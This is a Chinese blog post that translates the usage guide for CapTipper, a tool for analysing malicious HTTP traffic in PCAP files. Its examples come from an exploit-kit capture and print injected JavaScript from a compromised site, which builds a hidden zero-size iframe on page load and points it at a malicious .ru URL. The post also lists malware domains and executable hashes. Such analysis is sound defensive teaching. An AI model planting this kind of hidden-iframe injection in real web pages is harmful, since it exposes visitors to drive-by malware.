A-A+

CapTipper 使用方法详细说明(汉化中文)

2018年10月07日 23:29 学习笔记 暂无评论 阅读 156 views 次

【注意:此文章为博主原创文章!转载需注意,请带原文链接,至少也要是txt格式!】

什么是CapTipper?

CapTipper是一个用于分析,探索和恢复HTTP恶意流量的python工具。

CapTipper设置一个Web服务器,其作用与PCAP文件中的服务器完全相同,

并包含内部工具和强大的交互式控制台,用于分析和检查找到的主机,对象和对话。

该工具为安全研究人员提供了对文件的轻松访问和对网络流的理解,

在尝试研究漏洞利用程序,前提条件,版本,混淆,插件和shellcode时非常有用。

使用偷渡式流量捕获(例如,漏洞利用工具包)向CapTipper提供向用户显示已发送的请求URI和响应元数据。

用户此时可以浏览到http://127.0.0.1/(host]/[URI]并将响应接收回浏览器。

此外,还启动了一个交互式shell,以便使用各种命令进行更深入的调查,例如:hosts,hexdump,info,ungzip,body,client,dump等等......

CapTipper根据GPLv3许可发布,版权归Omri Herscovici所有。源代码可在GitHub上获得。

----------个人觉得这个还可以,也有一些弊端吧,不过毕竟最后一次更新也是3年前左右的工具了--------

直白一点的说其实这个工具就是一个相对来说便捷的pcap包的分析工具。虽然没有Wireshark那么详细,但是比它更便捷,更直白吧。

参数

基本用法:

./CapTipper.py  [参数]

CapTipper接受命令行参数:

-h, --help	打印此帮助信息并退出
-p PORT, --port PORT  设置Web服务器端口
-d FOLDER, --dump FOLDER  转储所有文件并退出
-s, --server-off   禁用Web服务器
-short, --short-url   显示缩短的URI路径
-r FOLDER, --report FOLDER   创建JSON和HTML报告
-g, --ungzip	自动ungzip响应
-u, --update	将CapTipper更新到最新版本

控制台
CapTipper的初始化以下列格式输出客户端和服务器之间的对话:

[ID] : REQUEST URI -> SERVER RESPONSE TYPE (FILENAME) [SIZE IN BYTES] (Magic: $Whatype)
ID:特定会话的已分配ID
REQUEST URI:在GET请求中发送到服务器的URI
SERVER RESPONSE TYPE:服务器响应头中返回的内容类型
FILENAME:文件名可以是一些东西:
    响应头中给出的Filename属性
    源自URI
    由CapTipper指定,如果找不到上述任何内容
字节大小:响应体型字节
MAGIC:Whatype库标识的文件格式

初始化后,发生了两件事:
CapTipper创建一个伪Web服务器,其行为类似于pcap中的Web服务器
解释器已启动
解释器包含用于进一步调查PCAP文件中对象的内部工具。

在浏览器中打开URI只需键入open对象ID即可。有关Web服务器的更多信息,请参阅Webserver一章。

以下是所有当前可用命令的详细信息。

 

open

CapTipper启动一个本地Web服务器模仿在PCAP Web服务器(一个或多个)。该open命令获取给定的对话并启动默认浏览器以转到本地Web服务器上的该URL。
例:

CT> open 0
Opening http://localhost:80/ in default browser

 

log

记录对本地Web服务器的每个请求,并使用以下log命令查看:

CT> log
[2015-07-08T16:25:18.815575] 127.0.0.1 : GET / HTTP/1.1

 

convs

convs 将以CapTipper启动时显示的形式显示所有会话。

CT> convs
Conversations Found:

0:  /  -> text/html (0.html) [5.4 KB]  (Magic: GZ)
1:  /seedadmin17.html  -> text/html (seedadmin17.html) [354.0 B]  (Magic: HTML)
2:  /wp-includes/js/jquery/jquery.js?ver=1.7.2  -> application/javascript (jquery.js) [38.6 KB]  (Magic: GZ)
3:  /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html  -> text/html (15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html) [110.5 KB]  (Magic: HTML)
4:  /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg  -> image/jpeg (MetroWest_COVER_Issue2_Feb2014.jpg) [341.8 KB]  (Magic: JPG)
5:  /images/footer/3000melbourne.png  -> image/png (3000melbourne.png) [2.9 KB]  (Magic: PNG)
6:  /images/footer/3207portmelbourne.png  -> image/png (3207portmelbourne.png) [3.0 KB]  (Magic: PNG)
7:  /wp-content/uploads/2012/09/background1.jpg  -> image/jpeg (background1.jpg) [32.3 KB]  (Magic: JPG)
8:  /00015d76d9b2rr9f/1415286120  -> application/octet-stream (00015d76.swf) [30.8 KB]  (Magic: SWF)
9:  /00015d766423rr9f/1415286120  -> application/pdf (XykpdWhZZ2.pdf) [9.7 KB]  (Magic: PDF)
10:  /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6  -> application/octet-stream (5.exe) [136.0 KB]  (Magic: EXE)
11:  /00015d76rr9f/1415286120/5/x00809070554515d565b010b03510053535c0505;1;6;1  -> application/octet-stream (5.exe) [136.0 KB]  (Magic: EXE)
12:  /00015d76rr9f/1415286120/7  -> application/octet-stream (7.exe) [136.0 KB]  (Magic: EXE)
13:  /00015d761709rr9f/1415286120  -> application/octet-stream (00015d76.swf) [7.9 KB]  (Magic: XAP)
14:  /00015d76rr9f/1415286120/8  -> application/octet-stream (8.exe) [136.0 KB]  (Magic: EXE)

 

hosts

该hosts命令允许我们对主机和流量中涉及的URI进行概览。

CT> hosts
Found Hosts:

 www.magmedia.com.au (182.160.157.199:80)
 ├-- /   [0]
 ├-- /wp-includes/js/jquery/jquery.js?ver=1.7.2   [2]
 ├-- /wp-content/uploads/2014/01/MetroWest_COVER_Issue2_Feb2014.jpg   [4]
 ├-- /images/footer/3000melbourne.png   [5]
 ├-- /images/footer/3207portmelbourne.png   [6]
 └-- /wp-content/uploads/2012/09/background1.jpg   [7]

 pixeltouchstudios.tk (108.61.196.84:80)
 └-- /seedadmin17.html   [1]

 grannityrektonaver.co.vu (173.244.195.17:80)
 ├-- /15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html   [3]
 ├-- /00015d76d9b2rr9f/1415286120   [8]
 ├-- /00015d766423rr9f/1415286120   [9]

 

head

head 输出给定的会话响应头。以下是它的帮助信息:

Display header of response
Usage: head 

####例如:
CT> head 0
Displaying header of object 0 (0.html):

HTTP/1.1 200 OK
Content-Encoding: gzip
Vary: Accept-Encoding
Transfer-Encoding: chunked
Date: Thu, 06 Nov 2014 15:03:41 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.4.32
X-Pingback: http://www.magmedia.com.au/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Set-Cookie: slimstat_tracking_code=256799id.b66059145c9c6730b88376341fa0a97e; expires=Sun, 07-Dec-2014 15:03:41 GMT; path=/

 

body

body将会话ID作为参数获取并输出响应主体。以下是它的帮助信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
Displays the text representation of the body
Usage: body <conv_id> [size=256]
 
###示例:
CT> body 1 128
Displaying body of object 1 (seedadmin17.html) [128 bytes]:
 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The doc

ungzip

body由于使用GZIP压缩,多次使用该命令将导致无法读取的响应。

CT> body 0
Displaying body of object 0 (0.html) [256 bytes]:

▼     ♦♥─╜i{#╟ס╢√}~♣X╓t♥═"HJצg♀░→o½%Y▓╡ם║m┘CR║
@a!▒P ╪כ        ╬o?≈‼╣TJ≥£≈\g╞jó╢\"#cן╚πg ÷ry≤~5↔O6םµ╦Vπ├ףף h|╛*ך╞½σh≤6_§ם╧ק╖כa╛ש.↨iπ╦┼á▌רl67¥ππ╤z╘^«╞╟ ÷∞°▀F╖כב▐hלכ═╦σ≥zZ4≤╓▌¢|╒Φg├σαv^,6φב=h╧≤═`╥\¶o
←▀↨π╧▐▌4ףf»≤π╢█h%חy{U▄╠≥A╤<n₧_┤?Φ=█▐▌_4/Z↨τ↨ק↨↨↨╟↨ח?^╢מ╟irq±┴i

ungzip 获取会话ID作为参数,并使用对象的未压缩数据创建新对象

CT> ungzip 0
 GZIP对象0(0.html)的解压缩成功!
 创建新对象:15

创建的新对象将添加到对象列表中,并可使用以下objects命令查看:

CT> objects
Displaying Objects:

 ID   CID     TYPE          NAME
---- -----  -----------   --------
  0 | 0   | body        | 0.html
  1 | 1   | body        | seedadmin17.html
  2 | 2   | body        | jquery.js
  3 | 3   | body        | 15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html
  4 | 4   | body        | MetroWest_COVER_Issue2_Feb2014.jpg
  5 | 5   | body        | 3000melbourne.png
  6 | 6   | body        | 3207portmelbourne.png
  7 | 7   | body        | background1.jpg
  8 | 8   | body        | 00015d76.swf
  9 | 9   | body        | XykpdWhZZ2.pdf
 10 | 10  | body        | 5.exe
 11 | 11  | body        | 5.exe
 12 | 12  | body        | 7.exe
 13 | 13  | body        | 00015d76.swf
 14 | 14  | body        | 8.exe
 15 | 0   | ungzip      | ungzip-0.html     <---------- 注意这个就是你新创建的对象的文件

 

REQ

req 获取会话ID作为参数并输出请求数据。例如:

CT> req 0
Displaying request for object 0 (0.html) [633 bytes]:

GET / HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.google.com/url?url=http://www.magmedia.com.au/&rct=j&frm=1&q=&esrc=s&sa=U&ei=uItbVLWHHYGpyASK44CoCQ&ved=0CBUQFjAA&usg=AFQjCNHuIidJc6dJKT_wy-UruJtaHR9Mhg
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.magmedia.com.au
Connection: Keep-Alive

 

hexdump

该hexdump命令显示给定会话对象的hexdump。与body命令一样,它显示对象的前256个字节,但这可以通过提供第二个size参数来更改。它的帮助信息:

Display hexdump of given object
Usage: hexdump  [size=256]

###举例:
CT> hexdump 12
Displaying hexdump of object 12 (7.exe) body [256 bytes]:

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 C8 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   37 62 C4 DA 73 03 AA 89 73 03 AA 89 73 03 AA 89    7b..s...s...s...
0090   F0 1F A4 89 72 03 AA 89 3C 21 A3 89 76 03 AA 89    ....r...<!..v...
00A0   45 25 A7 89 72 03 AA 89 52 69 63 68 73 03 AA 89    E%..r...Richs...
00F0   14 13 00 00 00 10 00 00 00 D0 01 00 00 00 40 00    ..............@.

 

peinfo

该peinfo显示关于二进制文件有趣的和可疑的信息的基础上,恶意软件菜谱PE扫描仪。它还支持使用-p参数来识别PEiD签名数据库中的打包程序。帮助信息:

Display PE info of the file
Usage: peinfo  [-p]
OPTIONS:
     -p     -   Check for packers

###举例:
CT> peinfo 12
Displaying PE info of object 12 (7.exe) [139264 bytes]:

Meta-data
================================================================================
Size:    139264 bytes
MD5:     67291715c45c4594b8866e90fbf5c7c4
SHA1:    a86dcb1d04be68a9f2d2373ee55cbe15fd299452
Date:    0x545A5C51 [Wed Nov  5 17:20:17 2014 UTC]
EP:      0x401314 .text 0/3
CRC:     Claimed: 0x24dec, Actual: 0x2621d [SUSPICIOUS]

Resource entries
================================================================================
Name               RVA      Size     Lang         Sublang                  Type
--------------------------------------------------------------------------------
RT_ICON            0x22980  0xea8    LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON            0x218d8  0x10a8   LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON            0x21470  0x468    LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON            0x21108  0x368    LANG_NEUTRAL SUBLANG_NEUTRAL
RT_ICON            0x20460  0xca8    LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON      0x20414  0x4c     LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION         0x201b0  0x264    LANG_ENGLISH SUBLANG_ENGLISH_US

Sections
================================================================================
Name       VirtAddr     VirtSize     RawSize      Entropy
--------------------------------------------------------------------------------
.text      0x1000       0x1b5d8      0x1c000      6.635876
.data      0x1d000      0x2128       0x1000       0.000000
.rsrc      0x20000      0x3828       0x4000       4.580442

Version info
================================================================================
Translation: 0x0409 0x04b0
InternalName: ProV
FileVersion: 3.07
CompanyName: VSO Software
Comments: All rights reserved
ProductName: Filmf\xf6rderanstalten
ProductVersion: 3.07
OriginalFilename: ProV.exe

 

info

info 将显示与给定对话相关的原始包数据,例如:

Server IP and PORT
Packet sent time
Host
URI
Referrer
Request Method
Result number
Result content type
File name
File type as identified by Whatype
Response size

###使用方法:
CT> help info
Display info on object
Usage: info 

###示例:
CT> info 1
Info of conversation 1:

 SERVER IP   : 108.61.196.84:80
 TIME        : Thu, 11/06/14 15:02:38
 HOST        : pixeltouchstudios.tk
 URI         : /seedadmin17.html
 REFERER     : http://www.magmedia.com.au/
 METHOD      : GET
 RESULT NUM  : 302 Found
 RESULT TYPE : text/html
 FILE NAME   : seedadmin17.html
 MAGIC       : HyperText Markup Language (HTML)
 LENGTH      : 354 B

 

plugin

CapTipper支持外部插件。有关插件基础结构的大量信息可以在插件章节中找到。该plugin命令允许用户使用存储在plugins\文件夹中的插件。它的帮助信息:

CT> help plugin
Launching an external plugin (alias: p)

usage: plugin  [-l] <*args>
     -l      - List all available plugins  列出所有可用的插件

examples:
     plugin find_scripts
     plugin 1
     p find_scripts

列出所有可用的插件:


CT> plugin -l
Loaded Plugins (3):
 0 : check_host - 检查给定id的主机是否存活
 1 : find_scripts - 查找对象主体中包含的外部脚本
 2 : print_body - 打印会话正文并根据需要进行ungzip

该plugin命令也可以由其别名使用p。
每个插件都分配有唯一的ID,因此插件的使用可以通过其名称或ID来完成。
例如,我们可以使用check_host已0分配id 的插件。此插件接收会话ID作为参数,并检查托管会话URL的域是否存活。让我们通过对话使用插件12:

CT> p 0 12
正在检查主机grannityrektonaver.co.vu
IP:PORT = 173.244.195.17:80
[ - ]服务器已经死了

 

dump

该dump命令将给定的对象ID或PCAP中找到的所有文件写入磁盘。它的帮助信息:

###将目标文件转储到给定的文件夹
Usage: dump   [-e]
Options:
   -e       - ignores executables

###示例:
dump 4 c:\files\index.html
            将对象4转储到给定路径

dump all c:\files
            按所找到的名称将所有文件转储到文件夹

dump all c:\files -e
             将所有文件按其找到的名称转储到文件夹,而不使用EXE文件

 

objects

该objects命令显示Core章节中描述的对象列表。

CT> objects
Displaying Objects:

 ID   CID     TYPE          NAME
---- -----  -----------   --------
  0 | 0   | body        | 0.html
  1 | 1   | body        | seedadmin17.html
  2 | 2   | body        | jquery.js
  3 | 3   | body        | 15c0b14drr9f_1_08282d03fb0251bbd75ff6dc6e317bd9.html
  4 | 4   | body        | MetroWest_COVER_Issue2_Feb2014.jpg
  5 | 5   | body        | 3000melbourne.png
  6 | 6   | body        | 3207portmelbourne.png
  7 | 7   | body        | background1.jpg
  8 | 8   | body        | 00015d76.swf
  9 | 9   | body        | XykpdWhZZ2.pdf
 10 | 10  | body        | 5.exe
 11 | 11  | body        | 5.exe
 12 | 12  | body        | 7.exe
 13 | 13  | body        | 00015d76.swf
 14 | 14  | body        | 8.exe

 

find

该find命令搜索给定对话或所有对话中给定正则表达式的所有出现。它的帮助信息:

###在所有或特定对象中搜索正则表达式
Usage: find  

Output data is displayed as follows:
   ([Line number] , [Offset from begining of file]) : [Found string]

建议使用-g标志启动CapTipper,以便自动解压缩所有对象并提高搜索效率。

在所有对象中搜索域rabiorik的示例:


CT> find all rabiorik
Searching 'rabiorik' in all objects:

 0.html [0]:
    (777,50587) : t(){create_frame("http://rabiorik.ru/wlkzkir.cgi?default")

 wlkzkir.cgi [7]:
    (8,256) : 22 (@RELEASE@) Server at rabiorik.ru Port 80

</b

以下,以及在特定对象中搜索create_frame的示例:

CT> find 0 create_frame
Searching 'create_frame' in object 0 (0.html):

 (777,50213) : xt/javascript'>function create_frame(a){var b=document.getEle
 (777,50566) : true}}function bdsls4t(){create_frame("http://rabiorik.ru/wlkz

 

slice

该命令slice显示来自对象的指定范围的字节(子字符串)。它的帮助信息:

###以给定长度从offset返回字节
Usage: slice   

在之前的使用之后find,我们可以通过从其起始位置请求256个字节来检查“create_frame”javascript函数。 slice接受object-id(0),offset start(50213)和length(256):

CT> slice 0 50213 256
Displaying 256 of bytes from offset 50213 in object 0 (0.html):

create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');c.id="weqe";c.style.width="0px";c.style.height="0px";
c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setA

它还包括对EOB(End Of Block)检测的支持。这将告诉slice显示代码,直到我们正在查看的当前块结束,无论是类,函数还是语句(基于大括号{})。
使用eob参数而不是长度值,例如:

CT> slice 0 50213 eob
Displaying 334 of bytes from offset 50213 in object 0 (0.html):

create_frame(a){var b=document.getElementById('weqe');if(typeof(b)!='undefined'&&b!=null){}
else{var c=document.createElement('iframe');c.id="weqe";c.style.width="0px";c.style.height="0px";
c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");
document.body.appendChild(c);c.src=a;return true}}

如果我们希望能够更方便地读取代码,我们可以使用该jsbeautify命令。

 

jsbeautify

的jsbeautify(JavaScript的美化)命令重新格式化的代码更人类可读的,用于深度检测非常有用的。它的帮助信息:

###美化后显示JavaScript代码
Usage: jsbeautify    

Example: jsbeautify slice   

Example: jsbeautify obj 

jsbeautify可以接受对话对象并创建一个新对象。(新对象可以转储到文件系统):

CT> jsbeautify obj 8
 JavaScript Beautify of object 8 (jquery.ui.effect.min.js) successful!
 New object created: 16

比如ungzip,创建的新对象可以使用objects。
jsbeautify也可以接受slice上一节中看到的命令。
jsbeautifyjavascript代码中“create_frame”函数的示例,与slice命令结合使用。

CT> jsbeautify slice 0 50213 512
create_frame(a) {
    var b = document.getElementById('weqe');
    if (typeof(b) != 'undefined' && b != null) {} else {
        var c = document.createElement('iframe');
        c.id = "weqe";
        c.style.width = "0px";
        c.style.height = "0px";
        c.style.border = "0px";
        c.frameBorder = "0";
        c.style.display = "none";
        c.setAttribute("frameBorder", "0");
        document.body.appendChild(c);
        c.src = a;
        return true
    }
}
function bdsls4t() {
    create_frame("http://rabiorik.ru/wlkzkir.cgi?default")
}
try {
    if (window.attachEvent) {
        window.attachEvent('onload', bdsls4t)
    } else {
        if (window.onload) {
            var curronload = wi
###可以说这个命令很实用的说。

 

VT

vt 将给定的对象ID MD5发送到VirusTotal,以查看它是否被任何反病毒提供程序识别。使用vt需要VirusTotal Public API密钥。例如:

CT> vt 14
 VirusTotal result for object 14 (8.exe):

 Detection: 46/57
 Last Analysis Date: 2015-04-09 12:37:31
 Report Link: https://www.virustotal.com/file/955e4e4a56bf80a30636b0c34673cdd6a889aff6569331a5336e1606e7c1050c/analysis/1428583051/

 Scan Result:
    MicroWorld-eScan        Trojan.GenericKD.1961906        12.0.250.0      20150409
    nProtect        Trojan.GenericKD.1961906        2015-04-09.02   20150409
    CAT-QuickHeal   TrojanPWS.Zbot.rw3      14.00   20150409
    McAfee  Generic.vd      6.0.5.614       20150409
    Malwarebytes    Trojan.Dorkbot.ED       1.75.0.1        20150409
    VIPRE   Trojan.Win32.Generic.pak!cobra  39190   20150409
    BitDefender     Trojan.GenericKD.1961906        7.2     20150409
    K7GW    Trojan ( 004b065c1 )    9.202.15539     20150409
    K7AntiVirus     Trojan ( 004b065c1 )    9.202.15538     20150409
    Agnitum Trojan.Injector!qCiqLIlbpUs     5.5.1.3 20150408
    F-Prot  W32/Injector.OA 4.7.1.166       20150409
    Symantec        Infostealer.Limitail    20141.2.0.56    20150409
    Norman  Injector.HKVF   7.04.04 20150409
    TotalDefense    Win32/Tofsee.CQVQOaC    37.0.11540      20150409
    TrendMicro-HouseCall    TROJ_SPNV.01KC14        9.700.0.1001    20150409
    Avast   Win32:VB-AIWF [Trj]     8.0.1489.320    20150409
    Kaspersky       Trojan.Win32.VB.ctmy    15.0.1.10       20150409
    NANO-Antivirus  Trojan.Win32.Spambot.dippmr     0.30.10.952     20150409
    ViRobot Trojan.Win32.R.Agent.139264[h]  2014.3.20.0     20150409
    Rising  PE:Malware.XPACK-HIE/Heur!1.9C48        25.0.0.17       20150409
    Ad-Aware        Trojan.GenericKD.1961906        12.0.163.0      20150409
    Emsisoft        Trojan.GenericKD.1961906 (B)    3.0.0.600       20150409
    Comodo  UnclassifiedMalware     21701   20150409
    F-Secure        Trojan.GenericKD.1961906        11.0.19100.45   20150409
    DrWeb   Trojan.Spambot.12689    7.0.12.3050     20150409
    Zillya  Trojan.VB.Win32.129714  2.0.0.2132      20150408
    TrendMicro      TROJ_SPNV.01KC14        9.740.0.1012    20150409
    McAfee-GW-Edition       BehavesLike.Win32.AAEH.ch       v2015   20150409
    Sophos  Mal/Generic-L   4.98.0  20150409
    Cyren   W32/Injector.CFDL-3956  5.4.16.7        20150409
    Avira   TR/Injector.139264.29   3.6.1.96        20150409
    Antiy-AVL       Trojan/Win32.SGeneric   1.0.0.1 20150409
    Microsoft       Backdoor:Win32/Tofsee.F 1.1.11502.0     20150409
    AhnLab-V3       Trojan/Win32.MDA        2015.04.09.00   20150408
    GData   Trojan.GenericKD.1961906        25      20150409
    ALYac   Trojan.GenericKD.1961906        1.0.1.4 20150409
    AVware  Trojan.Win32.Generic.pak!cobra  1.5.0.21        20150409
    Panda   Trj/WLT.B       4.6.4.2 20150408
    Zoner   Trojan.Tofsee.AX        1.0     20150407
    ESET-NOD32      Win32/Tofsee.AX 11448   20150409
    Tencent Trojan.Win32.Qudamah.Gen.17     1.0.0.1 20150409
    Ikarus  Trojan-Spy.Agent        T3.1.8.9.0      20150409
    Fortinet        W32/BOVZ!tr     5.0.999.0       20150409
    AVG     Inject2.BDIT    15.0.0.4328     20150409
    Baidu-International     Trojan.Win32.VB.ctmy    3.5.1.41473     20150409
    Qihoo-360       HEUR/QVM03.0.Malware.Gen        1.0.0.1015      20150409

这个我要解释一下,好像是把你下载的exe程序的md5提取出来,然后提交到病毒中心进行分析。

 

iframes

该iframes命令搜索iframe标记作为html源的一部分。

CT> iframes 2
Searching for iframes in object 2 (jquery.js)...
 1 iframe(s) Found!

 [I] 1 : http://pixeltouchstudios.tk/seedadmin17.html

 

client

显示PCAP中找到的客户端上的所有收集数据。

CT> client

Client Info:

 IP               :  192.168.204.136
 MAC              :  00:0c:29:64:76:eb
 USER-AGENT       :  Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
 X-FLASH-VERSION  :  11,8,800,94

 

ziplist

该ziplist命令接收一个包含ZIP文件的对象ID,并显示存储在其中的所有文件和文件夹。例如:

CT> ziplist 6
 12 Files found in zip object 6 (QrWusuR.jar):

 [Z] 1 : META-INF/
 [Z] 2 : META-INF/MANIFEST.MF
 [Z] 3 : bDNxrqYgNO.class
 [Z] 4 : dNMU.class
 [Z] 5 : dxQegSHi.class
 [Z] 6 : EzAD.class
 [Z] 7 : ICrWA.class
 [Z] 8 : lcaOISBn.class
 [Z] 9 : pmd.class
 [Z] 10 : thXEdm.class
 [Z] 11 : YWbTSCCIk.class
 [Z] 12 : eqx.ps

 

output

该output命令将所有控制台命令和结果记录到文件中。这是通过覆盖来完成的sys.stdout。

CT> output /Users/omriher/Temp/Nuclear-110615.txt
Logging to /Users/omriher/Temp/Nuclear-110615.txt

日志记录仅包括使用该output命令后的数据。为了停止使用日志stop作为命令参数。

CT> output stop
Stopped logging to /Users/omriher/Temp/Nuclear-110615.txt

strings

该strings命令获取一个对象id并返回该对象中找到的所有字符串。例如:

CT> strings 14
Strings found in object 14 (8.exe) [139264 bytes]:
!This program cannot be run in DOS mode.
Richs
.text
`.data
.rsrc
MSVBVM60.DLL
Meistillustriertes
JGd:O
Kontrollmodus
Baustoffkartelle5
Kontrollmodus
Kanonenfeuerunterst
tzungen57
...

hashes

该hashes命令显示给定对象的所有可用哈希值。

CT>哈希14
 对象14(8.exe)的哈希:

 md5:67291715c45c4594b8866e90fbf5c7c4
 sha1:a86dcb1d04be68a9f2d2373ee55cbe15fd299452
 sha224:6cc5585425cbb8b656ac4d12ce6331561df705787a0f8036b5f47eed
 sha256:955e4e4a56bf80a30636b0c34673cdd6a889aff6569331a5336e1606e7c1050c
 sha384:a207d38c964a0736adb86e74ea20ae5737afea9bfc87b7126ebb6d628432f6261dcef15cacf3b3bc14b072374dadf676
 sha512:703a9a69239ffe3bddf44fecf09136cb1e9872708d8e3d2d39f9904a4cc075d9e63d6b421bea8f1affeef855f8d9c5b903a517779777febaa84521824b4a07e1

翻译自官方地址:https://captipper.readthedocs.io/en/latest/Usage.html

布施恩德可便相知重

微信扫一扫打赏

支付宝扫一扫打赏

×
标签:

给我留言